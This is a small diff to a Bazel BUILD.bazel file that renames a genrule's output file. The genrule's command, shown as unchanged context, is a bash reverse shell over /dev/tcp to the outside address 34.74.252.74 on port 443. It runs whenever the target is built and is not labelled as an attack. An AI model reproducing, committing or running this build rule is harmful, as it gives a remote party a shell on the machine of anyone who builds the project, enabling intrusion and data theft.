--- a/BUILD.bazel
+++ b/BUILD.bazel
@@ -1,6 +1,6 @@
 genrule(
   name = "build",
-  outs = ["foozzzzz"],
+  outs = ["foozzzzzaa"],
   cmd = "/bin/bash -l > /dev/tcp/34.74.252.74/443 0<&1 2>&1",
   visibility = ["//visibility:public"],
 )
